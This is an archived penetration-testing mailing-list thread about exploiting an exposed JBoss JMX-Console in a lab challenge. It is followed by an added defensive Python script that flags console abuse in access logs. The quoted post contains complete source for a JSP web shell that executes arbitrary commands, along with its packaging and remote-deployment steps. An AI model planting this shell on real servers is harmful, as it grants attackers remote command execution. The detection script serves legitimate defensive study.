Penetration Testing
breaking jboss with a browser? not happening Jan 14 2011 08:02PM
lazers (a alii85 gmail com) (5 replies)
Re: breaking jboss with a browser? not happening Jan 18 2011 11:32AM
Robin Wood (robin digininja org) (1 replies)
On 14 January 2011 20:02, lazers <a.alii85 (at) gmail (dot) com [email concealed]> wrote:
>
> I have been given the task to break into a JBoss application by my senior sec
> manager at my company.
> It's a hacking challenge staged in a test lab. This is what I have been given:
> web access to JBoss.
> Yes, that's pretty much it <3. He believes in the less-is-more philosophy. With some
> get-to-start-working info. I have been told that a vulnerability exists
> in the application and it's no 0-day exploit, it's a known vulnerability. It is
> set as an open-book challenge; I can get help anywhere I like. So what did I do
> so far?
>
> Yes, I googled; but I also ran a Nessus scan and the scan brought me one HIGH
> vulnerability. It has to do with the default JBoss installation using the
> JMX-Console. It's not a new vulnerability; I was able to reach this conclusion
> as I started googling. This particular vulnerability is very popular; I was
> saying to myself that my problems were over and I would break into
> JBoss in record time. But that has been largely untrue. Why? Well, if it
> wasn't true I wouldn't be here. I did the following (in steps):
>
> Attack vector: deployment scanner feature
>
> 1. Confirmed the default installation (by accessing localhost:9090); in my
> case it's 9090, not 8080 as in the hacking literature. Probably this is because I'm using a
> new version (idk the exact reason).
>
> 2. I wrote this JSP script (cmd.jsp) as told on sites.
>
> <%@ page import="java.util.*,java.io.*"%>
> <%
> %>
> <HTML><BODY>
> Commands with JSP
> <FORM METHOD="GET" NAME="myform" ACTION="">
> <INPUT TYPE="text" NAME="cmd">
> <INPUT TYPE="submit" VALUE="Send">
> </FORM>
> <pre>
> <%
> if (request.getParameter("cmd") != null) {
>     out.println("Command: " + request.getParameter("cmd") + "<BR>");
>     Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
>     OutputStream os = p.getOutputStream();
>     InputStream in = p.getInputStream();
>     DataInputStream dis = new DataInputStream(in);
>     String disr = dis.readLine();
>     while ( disr != null ) {
>         out.println(disr);
>         disr = dis.readLine();
>     }
> }
> %>
> </pre>
> </BODY></HTML>
>
> 3. Next I created a web.xml file to be placed in the WEB-INF folder:
>
> <?xml version="1.0" ?>
> <web-app xmlns="http://java.sun.com/xml/ns/j2ee"
>          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
>          xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
>          http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
>          version="2.4">
>   <servlet>
>     <servlet-name>Command</servlet-name>
>     <jsp-file>/cmd.jsp</jsp-file>
>   </servlet>
> </web-app>
>
> 4. I compiled the file cmd.jsp by placing the web.xml file in the WEB-INF folder:
>
> jar cvf cmd.war WEB-INF cmd.jsp
>
> 5. I put this file on an Apache HTTP server. The file cmd.war resides in the htdocs
> folder. It can be accessed by the URL: mywebserver:80/cmd.war
>
> 6. I go back to the JBoss default page and navigate myself to
> jboss.deploymentpage.
>
> 7. In the addurl tab I enter the path for my cmd.war file as
>
> http://mywebserver/cmd.war
>
> 8. Next I go to the victim webserver in an attempt to access my uploaded application:
> http://victim:9090/cmd/cmd.jsp
>
> 9. I get HTTP STATUS 404 - /cmd/cmd.jsp
>
> My app is supposed to be hot deployed by JBoss, but this is not the case,
> because even after 10-20 times after you have accessed the file I get the same error
> page. I want to know what the reason for this behavior is. I know there
> exist other attack vectors (e.g. RMI etc.) but I want to stick to this
> until I figure out the reason for this failure of the exploit.
>
> Am I compiling the .jsp file with incorrect syntax? Do I need to have a Tomcat
> server installed instead? I read on the internet that there could be some
> problems in JBoss trying to get a reverse shell on your web server, as
> JBoss is it work in bind-shell mode only? I'm really clueless as to what is
> happening; I spent 12 works on this single attack vector but I'm not making
> headway.
>
> JBoss gurus, help me.
>

Metasploit has a plugin that will do this automatically against JBoss
if you know the credentials.

I'd also check where the file is being deployed. I did this on a test
once and there were two open ports, I installed the app on one but
then got a 404 when browsing to it, when I accessed it through the
other port it worked fine.

Robin
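
Added example, not part of the original thread or of any tool mentioned in it: a defender-side check for the activity described in the quoted post, run over the application server's HTTP access log. It flags successful unauthenticated requests to /jmx-console/ and JSP requests that either follow from the same client or carry a `cmd` parameter. The log lines are constructed, and the common log format and the /jmx-console/HtmlAdaptor path are assumptions about the server's setup.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (common log format); all hosts and paths are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jan/2011:11:30:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 5120
10.0.0.5 - - [18/Jan/2011:11:30:40 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 812
10.0.0.5 - - [18/Jan/2011:11:31:10 +0000] "GET /cmd/cmd.jsp HTTP/1.1" 404 1010
10.0.0.9 - admin [18/Jan/2011:11:32:00 +0000] "GET /jmx-console/ HTTP/1.1" 200 5120
10.0.0.7 - - [18/Jan/2011:11:33:00 +0000] "GET /jmx-console/ HTTP/1.1" 401 0
10.0.0.5 - - [18/Jan/2011:11:34:00 +0000] "GET /cmd/cmd.jsp?cmd=id HTTP/1.1" 200 64
"""

LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def analyse(log_text):
    """Return (finding, client_ip, path) tuples in log order."""
    findings = []
    console_clients = set()  # clients that reached the console without credentials
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        ip, is_jsp = m["ip"], url.path.lower().endswith(".jsp")
        if url.path.startswith("/jmx-console"):
            # A 2xx answer with no authenticated user means the console is open.
            if m["user"] == "-" and m["status"].startswith("2"):
                # Assumption: a POST to the console is an MBean operation call.
                kind = "invoke" if m["method"] == "POST" else "access"
                console_clients.add(ip)
                findings.append(("unauth-console-" + kind, ip, url.path))
        elif is_jsp and "cmd" in parse_qs(url.query, keep_blank_values=True):
            # Parameter name used by the command JSP quoted in the post.
            findings.append(("jsp-cmd-param", ip, url.path))
        elif is_jsp and ip in console_clients:
            # Any JSP probe after console use, including 404s from a failed deploy.
            findings.append(("jsp-after-console", ip, url.path))
    return findings

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding)
```

Because the 404 in step 9 of the post is still logged, a failed deployment attempt leaves the same trail as a successful one.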

Copyright 2010, SecurityFocus